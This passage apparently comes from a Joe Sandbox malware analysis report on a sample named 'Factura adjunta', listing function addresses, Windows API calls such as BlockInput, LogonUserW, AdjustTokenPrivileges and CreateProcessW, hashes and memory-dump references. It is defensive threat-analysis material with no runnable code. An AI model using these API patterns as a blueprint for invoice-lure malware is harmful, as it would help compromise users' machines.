                            • Instruction ID: e8f823137c11c4aafd52037559e36e88c52719586598ee553e6b5b9df5493746
                            • Opcode Fuzzy Hash: 5fb27ac7dcf69bd0cb72d34b3e15b2c6fa4d9d7a3a292c663c9263412708203d
                            • Instruction Fuzzy Hash: 25F0823554522DEBDB109FA4CC49FEA776DFF08761F004165F918D6291D6309940CBE1
                            Function 0083CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowLongW.USER32(?,000000EC), ref: 0083CD74
                            • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,007EBBE5,?,?,?,?), ref: 0083CDA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: DialogLongNtdllProc_Window
                            • String ID:
                            • API String ID: 2065330234-0
                            • Opcode ID: 2e75dc6e201b91086f34407fb0b6044325029dc871f60e782fbebce5c7febb2a
                            • Instruction ID: 7a327358989eac5643413a9feea071e0093ea403dc6609fbea728bce2b936227
                            • Opcode Fuzzy Hash: 2e75dc6e201b91086f34407fb0b6044325029dc871f60e782fbebce5c7febb2a
                            • Instruction Fuzzy Hash: 96E08670200258BFEB145F19DC0AFBA3B54FB44751F408625F956E90E1C7709850D7A0
                            Function 00808713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00808851), ref: 00808728
                            • CloseHandle.KERNEL32(?,?,00808851), ref: 0080873A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AdjustCloseHandlePrivilegesToken
                            • String ID:
                            • API String ID: 81990902-0
                            • Opcode ID: d9885061654e457369fae9d1faf2970b03f616a8c43e0b8f8b70d7b8b7f0705c
                            • Instruction ID: 8c56d62087c57bcf2ed3b00595c289b94e5a7893249393e7de90f5fb124f9177
                            • Opcode Fuzzy Hash: d9885061654e457369fae9d1faf2970b03f616a8c43e0b8f8b70d7b8b7f0705c
                            • Instruction Fuzzy Hash: A0E0B676010610EFEB253B65FD09D777BA9FB44350B24882AF59680571DB62AC90DB50
                            Function 007DA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,00844178,007D8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 007DA39A
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007DA3A3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: f8a808fd290c3e9e18cf4189e8b4d6089718611bf4ac631f1ae3066525b6723f
                            • Instruction ID: 8859b48166b33bcc81c24758b81b71f174780e3a0f7d4438b90c30d8bd9615e7
                            • Opcode Fuzzy Hash: f8a808fd290c3e9e18cf4189e8b4d6089718611bf4ac631f1ae3066525b6723f
                            • Instruction Fuzzy Hash: B4B09231454208ABCA002B91EC09B8A3F68FB85AA2F404420F70D85262CB6254508AD1
                            Function 007DF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bab57e6021264d31473bbde600375ed41721a022ca76a964b6b24e1f4ee8b6f7
                            • Instruction ID: 877f6fbace8dd0c3f64ee45adf570bccf75f8163bf0535030d1e5836440c0c39
                            • Opcode Fuzzy Hash: bab57e6021264d31473bbde600375ed41721a022ca76a964b6b24e1f4ee8b6f7
                            • Instruction Fuzzy Hash: E4321266D69F414DD7239634DC32336A298EFB73D4F15DB37E81AB5AA6EB28C4834100
                            Function 007E267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4dbeee81633ffdcad1d6aa89bde56d201034b6cc5530a4e06ad6e5b40758d4c
                            • Instruction ID: bde4c940828f30f382ba2d15c8de7a1e1ff8fdcabd2838a8ca3a500d735bf1e1
                            • Opcode Fuzzy Hash: b4dbeee81633ffdcad1d6aa89bde56d201034b6cc5530a4e06ad6e5b40758d4c
                            • Instruction Fuzzy Hash: 85B1EE34E6AF414DD2239A398835336B64CBFBB2D9B51D71BFC2674E22FB2185838141
                            Function 00818B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            • __time64.LIBCMT ref: 00818B25
                              • Part of subcall function 007D543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008191F8,00000000,?,?,?,?,008193A9,00000000,?), ref: 007D5443
                              • Part of subcall function 007D543A: __aulldiv.LIBCMT ref: 007D5463
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Time$FileSystem__aulldiv__time64
                            • String ID:
                            • API String ID: 2893107130-0
                            • Opcode ID: f8dd8ce5453b108545ffd2b01a9ecc6f197c549594b6ac8f239e8d185c4c7d00
                            • Instruction ID: d4b04d42744c5e15867b28c75c250fcf79b092b2acc82c87a5166122b99a7e6b
                            • Opcode Fuzzy Hash: f8dd8ce5453b108545ffd2b01a9ecc6f197c549594b6ac8f239e8d185c4c7d00
                            • Instruction Fuzzy Hash: 4B21B772639510CBC729CF25D441A52B3E5FFA5321B288E6CD1E9CB2D0CA74B985CB54
                            Function 0083DA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0083DB46
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: DialogLongNtdllProc_Window
                            • String ID:
                            • API String ID: 2065330234-0
                            • Opcode ID: de23d20580a7f4702a876f2cb65ad19466611114a8d7f9e7faab1bbc86aef965
                            • Instruction ID: 65cc68158ad26ed62852c00c801c01a483ff3fcc90419b5ece5f12de6b058c27
                            • Opcode Fuzzy Hash: de23d20580a7f4702a876f2cb65ad19466611114a8d7f9e7faab1bbc86aef965
                            • Instruction Fuzzy Hash: A511EB71204325BBEB285E2CED05FBA7754F7C5B34F208314F955DB1D2CAA09D1092D5
                            Function 0083C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                              • Part of subcall function 007B2344: GetCursorPos.USER32(?), ref: 007B2357
                              • Part of subcall function 007B2344: ScreenToClient.USER32(008767B0,?), ref: 007B2374
                              • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000001), ref: 007B2399
                              • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000002), ref: 007B23A7
                            • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,007EBC4F,?,?,?,?,?,00000001,?), ref: 0083C272
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                            • String ID:
                            • API String ID: 2356834413-0
                            • Opcode ID: e2f99af5024bea9034ac7bebf7595b16fe6f87ff5f6b58362180bb749bd54bcd
                            • Instruction ID: fb0ff1cde8e29c2422d5d393eee7ab4b7857fb3572a30ca0f2fad95ee6f058f8
                            • Opcode Fuzzy Hash: e2f99af5024bea9034ac7bebf7595b16fe6f87ff5f6b58362180bb749bd54bcd
                            • Instruction Fuzzy Hash: 38F08230200228EBDF04AF49CC19FBA3B91FB44756F004025F95A9B292CB79A870DBE0
                            Function 007B189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,007B1B04,?,?,?,?,?), ref: 007B18E2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: DialogLongNtdllProc_Window
                            • String ID:
                            • API String ID: 2065330234-0
                            • Opcode ID: f5054ad9a69f0630efb21997137fba9ec709cd02966327c6ddb03216c122e526
                            • Instruction ID: 47599abc01e41cee98a87512f2e6471e4d4570d21fd9fb7894d958be6b5097ed
                            • Opcode Fuzzy Hash: f5054ad9a69f0630efb21997137fba9ec709cd02966327c6ddb03216c122e526
                            • Instruction Fuzzy Hash: A8F08234600615DFDB18DF14D864FB637E2FB443A1F908629F9564B2A1DB35DCA0DB50
                            Function 008241FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • BlockInput.USER32(00000001), ref: 00824218
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BlockInput
                            • String ID:
                            • API String ID: 3456056419-0
                            • Opcode ID: 8870d16bcb8e2930931561511228084a8b61971357ddc46a98d59d9efd361907
                            • Instruction ID: f6be9536ccb4524728f0916ee1ffe0c34b0ace041e924d8a780882b1ce9472f1
                            • Opcode Fuzzy Hash: 8870d16bcb8e2930931561511228084a8b61971357ddc46a98d59d9efd361907
                            • Instruction Fuzzy Hash: 13E012312401149FC7109F5AE445A9AB7D8EF94760F008415FA4AD7252DA74A8408BA0
                            Function 0083CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0083CBEE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: DialogNtdllProc_
                            • String ID:
                            • API String ID: 3239928679-0
                            • Opcode ID: 18f1b17ee39c2ecd81fcebab26e2d9eac72c78db7855b8e51e474cb94efef9fc
                            • Instruction ID: ca95174f67cfe65aeed715809dfa9c9a2e18105a939c01d242adb2ec38921124
                            • Opcode Fuzzy Hash: 18f1b17ee39c2ecd81fcebab26e2d9eac72c78db7855b8e51e474cb94efef9fc
                            • Instruction Fuzzy Hash: B7F09231640254BFDB21DF58DC09FD67B95FB49760F148418FA25672E2CBB0B820D7A1
                            Function 00814EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00814EEC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: mouse_event
                            • String ID:
                            • API String ID: 2434400541-0
                            • Opcode ID: d5c3cead377ab74ba1fedfa05f8d0d346a9cbc59830f1b2840d2046aa0b7ad71
                            • Instruction ID: db1b50f3aedcfca2bcf42f615e5dc23a12193b130e9049c1bf4b045789bb956e
                            • Opcode Fuzzy Hash: d5c3cead377ab74ba1fedfa05f8d0d346a9cbc59830f1b2840d2046aa0b7ad71
                            • Instruction Fuzzy Hash: 74D09E9916060979ED584B249C5FFF7110DFB407B5FD4755AB102D90C2D8D16CD55031
                            Function 00808C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008088D1), ref: 00808CB3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LogonUser
                            • String ID:
                            • API String ID: 1244722697-0
                            • Opcode ID: a5f88d4663ce5e9569c176ea4791decbae9bc8fe5bce6d16c53944f43bca0d92
                            • Instruction ID: 97306455250ad9684197eef7210e73c3eee3d0aa55da970f152e12930e6d1d2c
                            • Opcode Fuzzy Hash: a5f88d4663ce5e9569c176ea4791decbae9bc8fe5bce6d16c53944f43bca0d92
                            • Instruction Fuzzy Hash: A7D09E3226490EABEF019EA8DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
                            Function 0083CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,007EBC0C,?,?,?,?,?,?), ref: 0083CC24
                              • Part of subcall function 0083B8EF: _memset.LIBCMT ref: 0083B8FE
                              • Part of subcall function 0083B8EF: _memset.LIBCMT ref: 0083B90D
                              • Part of subcall function 0083B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00877F20,00877F64), ref: 0083B93C
                              • Part of subcall function 0083B8EF: CloseHandle.KERNEL32 ref: 0083B94E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                            • String ID:
                            • API String ID: 2364484715-0
                            • Opcode ID: 4fbbe631c1b2b37aac3349d671227b8e1f21bc61577ed04a18b99b66fa603024
                            • Instruction ID: 4cd3b5342ce0d3a299938a52541a56a546735950cfcd41493ef76a654e6b002a
                            • Opcode Fuzzy Hash: 4fbbe631c1b2b37aac3349d671227b8e1f21bc61577ed04a18b99b66fa603024
                            • Instruction Fuzzy Hash: 1BE04631200208DFCB01AF08DD04E8537A5FB4C341F004425FA1A972B2CB31E960EF91
                            Function 007B167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,007B1AEE,?,?,?), ref: 007B16AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: DialogLongNtdllProc_Window
                            • String ID:
                            • API String ID: 2065330234-0
                            • Opcode ID: 2151d655b436df2de98bc36d562afacc3f2ba22c37eb8cbd7db6124579e66bb6
                            • Instruction ID: 730f9fb7882e12cdaaeb2e9badca752c793896b9e57294e163c6609c8353cece
                            • Opcode Fuzzy Hash: 2151d655b436df2de98bc36d562afacc3f2ba22c37eb8cbd7db6124579e66bb6
                            • Instruction Fuzzy Hash: A3E01235600208FBCF09AF90DC15F643B26FB48355F108428FA594B2A2CF37E522DB50
                            Function 0083CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtdllDialogWndProc_W.NTDLL ref: 0083CB75
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
